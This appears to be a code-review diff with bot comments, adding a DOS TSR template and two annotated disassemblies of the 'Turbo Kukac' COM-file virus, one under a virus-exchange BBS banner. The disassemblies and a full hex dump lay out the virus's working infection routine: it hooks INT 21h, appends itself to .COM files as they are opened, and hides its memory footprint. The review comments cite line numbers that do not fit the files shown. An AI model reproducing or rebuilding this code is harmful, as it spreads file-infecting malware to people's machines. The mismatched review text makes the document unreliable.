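Review bot: The comment on L16631, `mov ah, DOS_TERMINATE ; terminate & stay resident`, is wrong: DOS_TERMINATE is 4Ch, the plain terminate used on the already-installed path, and only the 31h call at L16645 stays resident; change it to `mov ah, DOS_TERMINATE ; terminate, do NOT stay resident (already installed)`. `check_resident` looks for the two signature words at fixed offsets inside whichever segment currently owns the INT 1Ch vector, so if another program hooks INT 1Ch after this one the check fails and a second copy installs; the comment above `check_resident` should state that limitation. In `new_int` the `pushf / sti` and `popf` at L16595-L16602 bracket an empty slot, which the comment should say outright, e.g. `; resident work goes between the sti and the popf; flags are restored before chaining`.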


@ -0,0 +1,296 @@
;*************************************************************
;** Terminate-but-Stay-Resident **
;** Original from the "Programmer's Journal" **
;** Modified by Alroger L. Gomes Jr. **
;** Any comments/question send message for "Roger Gomes" **
;** on the PDSE BBS (408)735-7190. Have Fun! **
;*************************************************************
; Insert you program on line # 157.
Delay_Count Equ 36 ;36 ticks=approx. 2 seconds
; Locations of BIOS Data needed by the resident program
Bios_Data Segment at 40h
Org 17h
Kbd_Status dw ?
Org 6Ch
Low_Timer dw ?
Bios_Data EndS
Code Segment
Assume Cs:Code, Ds:Code, Es:Nothing, Ss:Nothing
Org 100h
Entry_Point:
Jmp Install
Hot_Keys dw 01010B
This_Time dw ?
Trig_Time dw ?
Dos_Busy Label dword
Dos_Busy_Off dw ?
Dos_Busy_Seg dw ?
Criterr_Flag db ?
Already8 db 0
MenuON db 0
;*** Replacement for Int 24h - critical Dos Error ***
Diverted_Int24:
Mov Cs:Criterr_Flag,1
Xor Al,Al
Iret
Int_24_Vect Label dword
Int_24_Off dw ?
Int_24_Seg dw ?
;***** ID CODE *****
Res_ID1 dw 'Al'
Res_ID2 dw 'ro'
Res_ID3 dw 'ge'
;*******************
;*** Replacement for Int 8 - Timer hardware Interrupt ***
Diverted_Int8:
Pushf
Call_Int8 db 09Ah
Int_8_Vect Label dword
Int_8_Off dw ?
Int_8_Seg dw ?
Cmp Cs:MenuOn,0
Je MenuNOT
Iret
MenuNOT:
Mov Cs:MenuOn,1
Push Ds
Push Bx
Lds Bx,Cs:Dos_Busy
Cmp Byte Ptr [Bx],0
Pop Bx
Pop Ds
Mov Cs:MenuOn,0
Jz Get_Bios_Data
Dos_is_Busy:
Iret
;*** Replacement for Int 28 - Generated by Dos, esp. during keyboard I/O ***
Diverted_Int28:
Pushf
Call_Int28 db 09Ah
Int_28_Vec Label dword
Int_28_Off dw ?
Int_28_Seg dw ?
Cmp Cs:MenuOn,0
Je Get_Bios_Data
Iret
Get_Bios_Data:
Mov Cs:MenuOn,1
Sti
Push Ds
Push Ax
Mov Ax,Bios_Data
Mov Ds,Ax
Assume Ds:Bios_Data
Mov Ax,Low_Timer
Mov Cs:This_time,Ax
Mov Ax,Kbd_Status
Push Cs
Pop Ds
Assume Ds:Code
Chk_Keys:
And Ax,Hot_Keys
Cmp Ax,Hot_Keys
Jne Back_to_Applic
Chk_Timer:
Mov Ax,This_Time
Cmp Ax,Trig_Time
Jb Time_is_Right
Sub Ax,Trig_Time
Sub Ax,Delay_Count
Jnc Time_is_Right
Back_to_Applic:
Pop Ax
Pop Ds
Mov Cs:MenuOn,0
Iret
Time_is_Right:
Mov Ax,This_Time
Mov Trig_Time,Ax
Pop Ax
Pop Ds
;***************************************************************************
; This is the Start of the application-dependent resident code
Start_Program:
Mov Cs:MenuOn,1
Push Ax
Push Bx
Push Cx
Push Dx
Push Si
Push Di
Push Bp
Push Ds
Push Es
Push Cs
Pop Ds
Mov Ax,3524h
Int 21h
Mov Int_24_Off,Bx
Mov Int_24_Seg,Es
Mov Ax,2524h
Mov Dx,Offset Diverted_Int24
Int 21h
;****************************************************************************
; Insert your program here.
;****************************************************************************
Restore_Int24:
Lds Dx,Int_24_Vect
Mov Ax,2524h
Int 21h
Pop Es
Pop Ds
Pop Bp
Pop Di
Pop Si
Pop Dx
Pop Cx
Pop Bx
Pop Ax
Mov Cs:MenuOn,0
Mov Cs:Already8,0
Iret
; This is the end off the applicant-dependent resident code
End_of_Res Label word
;***************************************************************************
; Installation
Install:
Mov Ax,Cs
Mov Ds,Ax
Mov Es,Ax
Mov Ah,9
Mov Dx,OffSet CopyRight
Int 21h
; Make sure that it is at least Dos 2.00
Mov Ah,30h
Int 21h
Or Al,Al
Jnz Chk_Vectors
Mov Dx,Offset BadDos_Msg
Mov Ah,9
Int 21h
Int 20h
; See if resident code is already Installed in Memory
Chk_Vectors:
Mov Ax,Cs
Mov Ds,Ax
Mov Es,Ax
Mov Ax,3508h
Int 21h
Cmp Word Ptr [Es:Bx-6],'Al'
Jne Not_Installed1
Cmp Word Ptr [Es:Bx-4],'ro'
Jne Not_Installed1
Cmp Word Ptr [Es:Bx-2],'ge'
Jne Not_Installed1
Mov Dx,Offset No_Install_Msg
Mov Ah,9
Int 21h
Mov Ax,4C01h
Int 21h
Not_Installed1:
Mov Ax,3577h
Int 21h
Mov Ax,Es
Cmp Ax,'Al'
Jne Not_Installed
Cmp Bx,'ro'
Jne Not_Installed
Mov Dx,Offset No_Install_Msg
Mov Ah,9
Int 21h
Mov Ax,4C01h
Int 21h
Not_Installed:
Mov Ax,Cs
Mov Ds,Ax
Mov Es,Ax
Push Es
Mov Ax,Cs
Mov Ds,Ax
Mov Es,Ax
Mov Ah,34h
Int 21h
Mov Dos_Busy_Off,Bx
Mov Dos_Busy_Seg,Es
Mov Ax,3508h
Int 21h
Mov Int_8_Off,Bx
Mov Int_8_Seg,Es
Mov Ax,Cs
Mov Es,Ax
Mov Ds,Ax
Mov Ax,2508h
Mov Dx,Offset Diverted_Int8
Int 21h
Mov Ax,'Al'
Mov Ds,Ax
Mov Dx,'ro'
Mov Ax,2577h
Int 21h
Mov Ax,Cs
Mov Ds,Ax
Mov Ax,3528h
Int 21h
Mov Int_28_Off,Bx
Mov Int_28_Seg,Es
Mov Ax,2528h
Mov Dx,Offset Diverted_Int28
Int 21h
Pop Es
; Terminate and stay resident
Mov Dx,Offset Install
Int 27h
No_Install_Msg db 'xxxx is already in memory!',10,13,10,13,'$'
BadDos_Msg db 'DOS 2.0 or greater needed!',10,13,10,13,'$'
CopyRight db 'xxxx by ?????? - yyyy $'
Code EndS
End Entry_Point
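Review bot: The installer at L16893-L16897 stores the ASCII words 'Al':'ro' into the INT 77h vector as a second residency marker, checked at L16859-L16865. On AT-class machines INT 77h is the vector for IRQ 15 on the second interrupt controller, so any device raising that IRQ would transfer control to a meaningless far address; the marker should live in the program's own data, which the `Res_ID1..3` words already provide through the INT 8 check at L16847-L16851. `Already8` (L16697) is declared and cleared at L16818 but never set or tested, and the `Cmp Cs:MenuOn,0 / Je MenuNOT / Iret` sequence at the top of `Diverted_Int8` is the reentrancy guard without saying so; a comment such as `; MenuOn != 0: already inside resident code, do not re-enter` would help the next reader.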

@ -0,0 +1,324 @@
@ virus unassembled list:
`90.07.21.
Magyar zat: Kv ri L szl¢
Tel.: (41) 21-822 07-13:20 mh.
21-033 18:00-
0EB0:0100 E80000 CALL 0103
0EB0:0103 90 NOP
0EB0:0104 5E POP SI ;SI=IP b zisc¡m
0EB0:0105 50 PUSH AX
0EB0:0106 51 PUSH CX
0EB0:0107 B82135 MOV AX,3521
0EB0:010A CD21 INT 21 ;INT 21h c¡m lekrdezse
0EB0:010C 8CC0 MOV AX,ES
0EB0:010E 3D0040 CMP AX,4000 ;mem¢ri ban vam ?
0EB0:0111 7220 JB 0133 ;nincs nem 4000h f”l
;mutat!
0EB0:0113 83EE03 SUB SI,+03 ;JMP+op hossza
0EB0:0116 BA8601 MOV DX,0186 ;eredeti JMP+op cime
0EB0:0119 03F2 ADD SI,DX ;b zishoz
0EB0:011B 8B1C MOV BX,[SI]
0EB0:011D 8B4C02 MOV CX,[SI+02]
0EB0:0120 891E0001 MOV [0100],BX ;eredeti JMP+op.
0EB0:0124 890E0201 MOV [0102],CX ;visszarak sa
0EB0:0128 8CD8 MOV AX,DS
0EB0:012A 8EC0 MOV ES,AX ;ES=DS
0EB0:012C 59 POP CX
0EB0:012D 58 POP AX
0EB0:012E BB0001 MOV BX,0100
0EB0:0131 FFE3 JMP BX ;ugr s 0100h-ra igy
;lefut az eredeti prg.
;Ha nincs a mem¢ri ban
0EB0:0133 A10200 MOV AX,[0002] ;PSP-ben a RAM tetejnek
;paragrafusc¡me
0EB0:0136 2D0008 SUB AX,0800
0EB0:0139 8EC0 MOV ES,AX ;virus £j szegmens
0EB0:013B BF0001 MOV DI,0100
0EB0:013E 83EE03 SUB SI,+03 ;JMP+op. hossza
0EB0:0141 B90002 MOV CX,0200 ;virus mrete
0EB0:0144 F3 REPZ
0EB0:0145 A4 MOVSB ;virus m sol sa az
;£j szegmensbe
0EB0:0146 8C06F200 MOV [00F2],ES ;£j szegmensc¡m
0EB0:014A B95501 MOV CX,0155 ;£j szegmensben a be-
;lpsi offset-je
0EB0:014D 890EF000 MOV [00F0],CX
0EB0:0151 FF2EF000 JMP FAR [00F0] ;ugr s az £j seg.:0155
;belpsi pont
0EB0:0155 8CC1 MOV CX,ES
0EB0:0157 8CD8 MOV AX,DS
0EB0:0159 26 ES:
0EB0:015A A38C02 MOV [028C],AX ;rgi seg (eredeti
;program)
0EB0:015D B80001 MOV AX,0100
0EB0:0160 26 ES:
0EB0:0161 A38A02 MOV [028A],AX ;0100h offset
0EB0:0164 8CC0 MOV AX,ES
0EB0:0166 8ED8 MOV DS,AX ;DS=£j seg
0EB0:0168 B82135 MOV AX,3521
0EB0:016B CD21 INT 21 ;INT 21h lekrdezse
0EB0:016D 2E CS:
0EB0:016E 891E7C02 MOV [027C],BX ;INT 21h offset
0EB0:0172 8CC3 MOV BX,ES
0EB0:0174 2E CS:
0EB0:0175 891E7E02 MOV [027E],BX ;INT 21h segment
0EB0:0179 B8A501 MOV AX,01A5 ;£j INT 21h offset
0EB0:017C 8BD0 MOV DX,AX
0EB0:017E 8BC1 MOV AX,CX
0EB0:0180 8ED8 MOV DS,AX
0EB0:0182 B82125 MOV AX,2521
0EB0:0185 CD21 INT 21 ;INT 21h ellop sa
0EB0:0187 8B168602 MOV DX,[0286] ;JMP+op.
0EB0:018B 8B0E8802 MOV CX,[0288] ;operandus
0EB0:018F A18C02 MOV AX,[028C] ;eredeti prg.seg.
0EB0:0192 8ED8 MOV DS,AX
0EB0:0194 89160001 MOV [0100],DX ;eredeti JMP+op.
0EB0:0198 890E0201 MOV [0102],CX ;visszarak sa
0EB0:019C 8EC0 MOV ES,AX
0EB0:019E 59 POP CX
0EB0:019F 58 POP AX
0EB0:01A0 2E CS:
0EB0:01A1 FF2E8A02 JMP FAR [028A] ;ugr s az eredeti
;programra
;£j INT 21h rutin
0EB0:01A5 90 NOP
0EB0:01A6 80FC3D CMP AH,3D ;file nyit s ?
0EB0:01A9 7403 JZ 01AE ;igen
0EB0:01AB E9C000 JMP 026E ;ugr s az eredeti
;INT 21h-ra
0EB0:01AE 1E PUSH DS
0EB0:01AF 06 PUSH ES
0EB0:01B0 50 PUSH AX
0EB0:01B1 53 PUSH BX
0EB0:01B2 51 PUSH CX
0EB0:01B3 52 PUSH DX
0EB0:01B4 57 PUSH DI
0EB0:01B5 56 PUSH SI
;Ellen”rzi hogy COM file-e
0EB0:01B6 8BFA MOV DI,DX ;Filespec.
0EB0:01B8 8CDE MOV SI,DS
0EB0:01BA 8EC6 MOV ES,SI
0EB0:01BC B000 MOV AL,00
0EB0:01BE B93200 MOV CX,0032
0EB0:01C1 FC CLD
0EB0:01C2 F2 REPNZ
0EB0:01C3 AE SCASB ;PATH lem sol sa
0EB0:01C4 83EF03 SUB DI,+03
0EB0:01C7 B84F4D MOV AX,4D4F ;'OM' AX-ba
0EB0:01CA 26 ES:
0EB0:01CB 3B05 CMP AX,[DI] ;'OM' ?
0EB0:01CD 7403 JZ 01D2 ;igen
0EB0:01CF E99400 JMP 0266 ;eredeti INT 21h-ra
0EB0:01D2 B82E43 MOV AX,432E ;'.C' AX-be
0EB0:01D5 26 ES:
0EB0:01D6 3B45FE CMP AX,[DI-02] ;'.C' ?
0EB0:01D9 7403 JZ 01DE ;biztos hogy COM file!
0EB0:01DB E98800 JMP 0266 ;eredeti INT 21h-ra
0EB0:01DE B43D MOV AH,3D ;file nyit sa
0EB0:01E0 B002 MOV AL,02 ;¡r s/olvas s
0EB0:01E2 E89000 CALL 0275 ;INT 21h hiv sa
0EB0:01E5 7303 JNB 01EA ;ha nincs hiba
0EB0:01E7 EB7D JMP 0266 ;eredeti INT 21h-ra
;File mret ellen”rzs
0EB0:01E9 90 NOP
0EB0:01EA 8BD8 MOV BX,AX ;kezel”
0EB0:01EC B90000 MOV CX,0000
0EB0:01EF BA0000 MOV DX,0000
0EB0:01F2 B80242 MOV AX,4202 ;file vgre poz.
0EB0:01F5 E87D00 CALL 0275 ;INT 21h hiv sa
0EB0:01F8 3D00FE CMP AX,FE00
0EB0:01FB 7369 JNB 0266 ;nagyobb INT 21h-ra
;Eredeti 4 byte beolvas sa (JMP+operandusa)
0EB0:01FD 2D0300 SUB AX,0003 ;JMP+op. hossza
0EB0:0200 2E CS:
0EB0:0201 A38102 MOV [0281],AX
0EB0:0204 B80042 MOV AX,4200 ;file elejre poz.
0EB0:0207 B90000 MOV CX,0000
0EB0:020A BA0000 MOV DX,0000
0EB0:020D E86500 CALL 0275 ;INT 21h hiv sa
0EB0:0210 B43F MOV AH,3F ;olvas s
0EB0:0212 B90400 MOV CX,0004 ;4 byte
0EB0:0215 BA8602 MOV DX,0286 ;ide olvassa
0EB0:0218 8CCF MOV DI,CS
0EB0:021A 8EDF MOV DS,DI ;DS=CS
0EB0:021C E85600 CALL 0275 ;INT 21h hiv sa
0EB0:021F B005 MOV AL,05
0EB0:0221 3A068902 CMP AL,[0289]
0EB0:0225 743F JZ 0266
;Virusra mutat¢ JMP+op be¡r sa a programba
0EB0:0227 B80042 MOV AX,4200 ;file elejre poz.
0EB0:022A B90000 MOV CX,0000
0EB0:022D 8BD1 MOV DX,CX
0EB0:022F E84300 CALL 0275 ;INT 21h hiv sa
0EB0:0232 B0E9 MOV AL,E9 ;JMP k¢dja
0EB0:0234 2E CS:
0EB0:0235 A28002 MOV [0280],AL ;leteszi
0EB0:0238 B005 MOV AL,05
0EB0:023A 2E CS:
0EB0:023B A28302 MOV [0283],AL
0EB0:023E B90400 MOV CX,0004 ;4 byte
0EB0:0241 BA8002 MOV DX,0280 ;JMP+op. kezdete
0EB0:0244 0E PUSH CS
0EB0:0245 1F POP DS
0EB0:0246 B440 MOV AH,40 ;ki¡r s
0EB0:0248 E82A00 CALL 0275 ;INT 21h hiv sa
;1C0h byte ki¡r sa FERT™Z<E284A2>S!
0EB0:024B B80242 MOV AX,4202 ;file vgre poz.
0EB0:024E B90000 MOV CX,0000
0EB0:0251 8BD1 MOV DX,CX
0EB0:0253 E81F00 CALL 0275 ;INT 21h hiv sa
0EB0:0256 BA0001 MOV DX,0100 ;0100h -t¢l
0EB0:0259 B9C001 MOV CX,01C0 ;01c0h byte
0EB0:025C B440 MOV AH,40 ;ki¡r sa
0EB0:025E E81400 CALL 0275 ;INT 21h hiv sa
;Ffert”z”tt file z r sa
0EB0:0261 B43E MOV AH,3E
0EB0:0263 E80F00 CALL 0275 ;INT 21h hiv sa
0EB0:0266 5E POP SI
0EB0:0267 5F POP DI
0EB0:0268 5A POP DX
0EB0:0269 59 POP CX
0EB0:026A 5B POP BX
0EB0:026B 58 POP AX
0EB0:026C 07 POP ES
0EB0:026D 1F POP DS
0EB0:026E 90 NOP
0EB0:026F 2E CS:
0EB0:0270 FF2E7C02 JMP FAR [027C] ;ugr s az eredeti
;INT 21h-ra
0EB0:0274 CF IRET
;Eredeti INT 21h hiv sa
0EB0:0275 9C PUSHF ;IRET miatt!
0EB0:0276 2E CS:
0EB0:0277 FF1E7C02 CALL FAR [027C] ;INT 21h hiv sa
0EB0:027B C3 RET
0EB0:027C 16 PUSH SS
0EB0:027D 130C ADC CX,[SI]
0EB0:027F 02E9 ADD CH,CL
0EB0:0281 1C00 SBB AL,00
0EB0:0283 050101 ADD AX,0101
0EB0:0286 EB12 JMP 029A
0EB0:0288 90 NOP
0EB0:0289 49 DEC CX
0EB0:028A 0001 ADD [BX+DI],AL
0EB0:028C DD0A ESC 29,[BP+SI][BP+SI]
0EB0:028E 0A0D OR CL,[DI]
0EB0:0290 9A6476206D CALL 6D20:7664
0EB0:0295 69 DB 69
0EB0:0296 6E DB 6E
0EB0:0297 64 DB 64
0EB0:0298 65 DB 65
0EB0:0299 6E DB 6E
0EB0:029A 206E61 AND [BP+61],CH
0EB0:029D 67 DB 67
0EB0:029E 7974 JNS 0314
0EB0:02A0 7564 JNZ 0306
0EB0:02A2 A073A3 MOV AL,[A373]
0EB0:02A5 6E DB 6E
0EB0:02A6 61 DB 61
0EB0:02A7 6B DB 6B
0EB0:02A8 2120 AND [BX+SI],SP
0EB0:02AA 54 PUSH SP
0EB0:02AB 7572 JNZ 031F
0EB0:02AD 62 DB 62
0EB0:02AE 6F DB 6F
0EB0:02AF 204020 AND [BX+SI+20],AL
0EB0:02B2 2E CS:
0EB0:02B3 2E CS:
0EB0:02B4 2E CS:
0EB0:02B5 202E2E2E AND [2E2E],CH
0EB0:02B9 201A AND [BP+SI],BL
0EB0:02BB 0000 ADD [BX+SI],AL
0EB0:02BD 0000 ADD [BX+SI],AL
0EB0:02BF 005374 ADD [BP+DI+74],DL
0EB0:02C2 20E8 AND AL,CH
0EB0:02C4 4E DEC SI
0EB0:02C5 01E9 ADD CX,BP
0EB0:02C7 51 PUSH CX
0EB0:02C8 FF2EC606 JMP FAR [06C6]
0EB0:02CC 050006 ADD AX,0600
0EB0:02CF 2E CS:
0EB0:02D0 C70609001000 MOV WORD PTR [0009],0010
0EB0:02D6 EB7B JMP 0353
0EB0:02D8 90 NOP
0EB0:02D9 2E CS:
0EB0:02DA C70609000A00 MOV WORD PTR [0009],000A
0EB0:02E0 EB71 JMP 0353
0EB0:02E2 90 NOP
0EB0:02E3 2E CS:
0EB0:02E4 FE060600 INC BYTE PTR [0006]
0EB0:02E8 56 PUSH SI
0EB0:02E9 8BF3 MOV SI,BX
0EB0:02EB 83C302 ADD BX,+02
0EB0:02EE 3E DS:
0EB0:02EF 8B7202 MOV SI,[BP+SI+02]
0EB0:02F2 2E CS:
0EB0:02F3 803E060000 CMP BYTE PTR [0006],00
0EB0:02F8 750A JNZ 0304
0EB0:02FA AC LODSB
0EB0:02FB 3C00 CMP AL,00
0EB0:02FD 743B JZ 033A
0EB0:02FF E80F03 CALL 0611
Megjegyzs:
Nincs k ros hat sa. Megold sa kit<EFBFBD>n, hiszen mg egy system
info lekrse esetn sem kkisebb a DOS  lltal l tott mem¢-
ria mret, mint a fizikai RAM mret!
DUMP
0EB0:0100 E8 00 00 90 5E 50 51 B8-21 35 CD 21 8C C0 3D 00 ....^PQ.!5.!..=.
0EB0:0110 40 72 20 83 EE 03 BA 86-01 03 F2 8B 1C 8B 4C 02 @r ...........L.
0EB0:0120 89 1E 00 01 89 0E 02 01-8C D8 8E C0 59 58 BB 00 ............YX..
0EB0:0130 01 FF E3 A1 02 00 2D 00-08 8E C0 BF 00 01 83 EE ......-.........
0EB0:0140 03 B9 00 02 F3 A4 8C 06-F2 00 B9 55 01 89 0E F0 ...........U....
0EB0:0150 00 FF 2E F0 00 8C C1 8C-D8 26 A3 8C 02 B8 00 01 .........&......
0EB0:0160 26 A3 8A 02 8C C0 8E D8-B8 21 35 CD 21 2E 89 1E &........!5.!...
0EB0:0170 7C 02 8C C3 2E 89 1E 7E-02 B8 A5 01 8B D0 8B C1 |......~........
0EB0:0180 8E D8 B8 21 25 CD 21 8B-16 86 02 8B 0E 88 02 A1 ...!%.!.........
0EB0:0190 8C 02 8E D8 89 16 00 01-89 0E 02 01 8E C0 59 58 ..............YX
0EB0:01A0 2E FF 2E 8A 02 90 80 FC-3D 74 03 E9 C0 00 1E 06 ........=t......
0EB0:01B0 50 53 51 52 57 56 8B FA-8C DE 8E C6 B0 00 B9 32 PSQRWV.........2
0EB0:01C0 00 FC F2 AE 83 EF 03 B8-4F 4D 26 3B 05 74 03 E9 ........OM&;.t..
0EB0:01D0 94 00 B8 2E 43 26 3B 45-FE 74 03 E9 88 00 B4 3D ....C&;E.t.....=
0EB0:01E0 B0 02 E8 90 00 73 03 EB-7D 90 8B D8 B9 00 00 BA .....s..}.......
0EB0:01F0 00 00 B8 02 42 E8 7D 00-3D 00 FE 73 69 2D 03 00 ....B.}.=..si-..
0EB0:0200 2E A3 81 02 B8 00 42 B9-00 00 BA 00 00 E8 65 00 ......B.......e.
0EB0:0210 B4 3F B9 04 00 BA 86 02-8C CF 8E DF E8 56 00 B0 .?...........V..
0EB0:0220 05 3A 06 89 02 74 3F B8-00 42 B9 00 00 8B D1 E8 .:...t?..B......
0EB0:0230 43 00 B0 E9 2E A2 80 02-B0 05 2E A2 83 02 B9 04 C...............
0EB0:0240 00 BA 80 02 0E 1F B4 40-E8 2A 00 B8 02 42 B9 00 .......@.*...B..
0EB0:0250 00 8B D1 E8 1F 00 BA 00-01 B9 C0 01 B4 40 E8 14 .............@..
0EB0:0260 00 B4 3E E8 0F 00 5E 5F-5A 59 5B 58 07 1F 90 2E ..>...^_ZY[X....
0EB0:0270 FF 2E 7C 02 CF 9C 2E FF-1E 7C 02 C3 16 13 0C 02 ..|......|......
0EB0:0280 E9 1C 00 05 01 01 EB 12-90 49 00 01 DD 0A 0A 0D .........I......
0EB0:0290 9A 64 76 20 6D 69 6E 64-65 6E 20 6E 61 67 79 74 .dv minden nagyt
0EB0:02A0 75 64 A0 73 A3 6E 61 6B-21 20 54 75 72 62 6F 20 ud.s.nak! Turbo
0EB0:02B0 40 20 2E 2E 2E 20 2E 2E-2E 20 1A 00 00 00 00 00 @ ... ... ......
0EB0:02C0 53 74 20 E8 4E 01 E9 51-FF 2E C6 06 05 00 06 2E St .N..Q........
0EB0:02D0 C7 06 09 00 10 00 EB 7B-90 2E C7 06 09 00 0A 00 .......{........
0EB0:02E0 EB 71 90 2E FE 06 06 00-56 8B F3 83 C3 02 3E 8B .q......V.....>.
0EB0:02F0 72 02 2E 80 3E 06 00 00-75 0A AC 3C 00 74 3B E8 r...>...u..<.t;.
0EB0:0300 0F .


@ -0,0 +1,426 @@
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
TURBO KUKAC v9.9 virus unassembled list:
`90.07.21.
Magyar zat: Kv ri L szl˘
Tel.: (41) 21-822 07-13:20 mh.
21-033 18:00-
28F8:0100 E80000 CALL 0103 ;IP rtke az SI-be
28F8:0103 90 NOP ;ez lesz a b zis offset
28F8:0104 5E POP SI
28F8:0105 50 PUSH AX
28F8:0106 51 PUSH CX
28F8:0107 B021 MOV AL,21
28F8:0109 B435 MOV AH,35
28F8:010B CD21 INT 21 ;INT 21h cˇmnek lekr-
;dezse
28F8:010D 8CC0 MOV AX,ES
28F8:010F 3D0040 CMP AX,4000 ;a mem˘ri ban van ?
28F8:0112 7224 JB 0138 ;nincs!
28F8:0114 83EE03 SUB SI,+03 ;b zis offset -3
;(3 byte hosszu a JMP
;+ az operandusa!)
28F8:0117 BAC102 MOV DX,02C1
28F8:011A 81EA0001 SUB DX,0100 ;0100h offset levon sa
;(COM file saj toss ga!)
28F8:011E 03F2 ADD SI,DX
28F8:0120 8B1C MOV BX,[SI] ;JMP k˘dja + az operan-
;dus fele
28F8:0122 8B4C02 MOV CX,[SI+02] ;JMP operandusa + 1 byte
28F8:0125 891E0001 MOV [0100],BX ;eredeti prg kezdet
28F8:0129 890E0201 MOV [0102],CX ;let rol sa
28F8:012D 8CD8 MOV AX,DS
28F8:012F 8EC0 MOV ES,AX ;ES=DS
28F8:0131 59 POP CX
28F8:0132 58 POP AX
28F8:0133 BB0001 MOV BX,0100 ;ugr s offset-je
28F8:0136 FFE3 JMP BX ;EREDETI PROGRAM V<>GRE-
;HAJTŹSA
;HA M<>G NINCS A MEM˘RIŹBAN
28F8:0138 8CD8 MOV AX,DS ;saj t szegmense
28F8:013A 48 DEC AX ;saj t seg-1= MCB. seg.
28F8:013B 8ED8 MOV DS,AX ;DS=MCB. szegmense
28F8:013D A10300 MOV AX,[0003] ;DOS  lltal a programnak
;foglalt mem˘riablokk
;hossza
28F8:0140 2D4100 SUB AX,0041 ;virus hossz t levonja
;bel”le (41*16 byte)
28F8:0143 A30300 MOV [0003],AX ;visszateszi igy a DOS
; lltal l tott teljes
;mem˘ria nagys ga a prg.
;kilpse ut n (41*16
;byte-tal) kevesebb lesz
;Hasonl˘an csin lja ezt
;a YANKEE DOODLE is, s
;ezzel azt ri el, hogy
;semmilyen
;System Storage Map
;programmal nem mutat-
;hat˘ ki a virus jele-
;lte a mem˘ri ban!
;A PCTOOLS system info
;kimutatja, azaz csak
;annyit l tni, hogy a
;fizikai RAM mret 640K
;s a DOS  lltal l tott
;az 639k byte! Igy k”-
;vetkeztetni lehet...
28F8:0146 8CC8 MOV AX,CS
28F8:0148 8ED8 MOV DS,AX ;DS=CS
28F8:014A A10200 MOV AX,[0002] ;PSP-ben a RAM tetej-
;nek a paragrafuscˇme
28F8:014D 2D0008 SUB AX,0800
28F8:0150 8EC0 MOV ES,AX ;virus Łj szegmense
28F8:0152 BF0001 MOV DI,0100
28F8:0155 83EE03 SUB SI,+03
28F8:0158 B90002 MOV CX,0200 ;virus hossza
28F8:015B F3 REPZ
28F8:015C A4 MOVSB ;virus m sol sa az Łj
;szegmensbe
28F8:015D 8C06C702 MOV [02C7],ES ;Łj szegmens t rol sa
28F8:0161 B96C01 MOV CX,016C ;belpsi pont
28F8:0164 890EC502 MOV [02C5],CX ;t rol sa
28F8:0168 FF2EC502 JMP FAR [02C5] ;ugr s az Łj szegmens
;01c6 offset-re
;UJ SZEGMENSBEN A BEL<45>P<EFBFBD>SI PONT
28F8:016C 8CC1 MOV CX,ES
28F8:016E 8CD8 MOV AX,DS ;ahonnan m solta mag t
28F8:0170 26 ES:
28F8:0171 A3CB02 MOV [02CB],AX ;R<>GI PRG. segment cˇm
28F8:0174 B80001 MOV AX,0100
28F8:0177 26 ES:
28F8:0178 A3C902 MOV [02C9],AX ;0100h offset t rol sa
28F8:017B 8CC0 MOV AX,ES
28F8:017D 8ED8 MOV DS,AX
28F8:017F BAC701 MOV DX,01C7 ;INT 05 - HARD COPY Łj
;offset-je
28F8:0182 B005 MOV AL,05
28F8:0184 B425 MOV AH,25
28F8:0186 CD21 INT 21 ;INT 05 ellop sa
28F8:0188 B435 MOV AH,35
28F8:018A B021 MOV AL,21
28F8:018C CD21 INT 21 ;INT 21h cˇm lekrdez-
;se
28F8:018E 2E CS:
28F8:018F 891EB702 MOV [02B7],BX ;INT 05h offset (rgi)
28F8:0193 8CC3 MOV BX,ES
28F8:0195 2E CS:
28F8:0196 891EB902 MOV [02B9],BX ;INT 05h segment (rgi)
28F8:019A B8D901 MOV AX,01D9 ;Łj INT 21h offset cˇm
28F8:019D 8BD0 MOV DX,AX
28F8:019F 8BC1 MOV AX,CX
28F8:01A1 8ED8 MOV DS,AX
28F8:01A3 B021 MOV AL,21
28F8:01A5 B425 MOV AH,25
28F8:01A7 CD21 INT 21 ;INT 21h ellop sa
28F8:01A9 8B16C102 MOV DX,[02C1] ;EREDETI JMP + AZ
28F8:01AD 8B0EC302 MOV CX,[02C3] ;OPERANDUSA!!!
28F8:01B1 A1CB02 MOV AX,[02CB] ;EREDETI PRG. SEG!!!
28F8:01B4 8ED8 MOV DS,AX
28F8:01B6 89160001 MOV [0100],DX ;eredeti JMP k˘dja
28F8:01BA 890E0201 MOV [0102],CX ;s operandusa
28F8:01BE 8EC0 MOV ES,AX
28F8:01C0 59 POP CX
28F8:01C1 58 POP AX
28F8:01C2 2E CS:
28F8:01C3 FF2EC902 JMP FAR [02C9] ;EREDETI PROGRAM FUTTA-
;TŹSA!
;Łj INT 05 - HARD COPY rutin
28F8:01C7 90 NOP
28F8:01C8 50 PUSH AX
28F8:01C9 1E PUSH DS
28F8:01CA 52 PUSH DX
28F8:01CB 8CC8 MOV AX,CS
28F8:01CD 8ED8 MOV DS,AX
;V<>GTELEN CIKLUS!
28F8:01CF BACE02 MOV DX,02CE ;sz”veg kezdete
;Turbo Kukac v9.9
28F8:01D2 B409 MOV AH,09 ;print string
28F8:01D4 E8D900 CALL 02B0 ;rgi INT 21h hiv sa
28F8:01D7 EBF6 JMP 01CF ;Łjra!
;Łj INT 21h rutin
28F8:01D9 90 NOP
28F8:01DA 80FC3D CMP AH,3D ;file nyit sa alfunkci˘?
28F8:01DD 7403 JZ 01E2 ;igen
28F8:01DF E9C700 JMP 02A9 ;nem ugr sa az eredeti
;INT 21h-ra
28F8:01E2 90 NOP
28F8:01E3 1E PUSH DS
28F8:01E4 06 PUSH ES
28F8:01E5 50 PUSH AX
28F8:01E6 53 PUSH BX
28F8:01E7 51 PUSH CX
28F8:01E8 52 PUSH DX
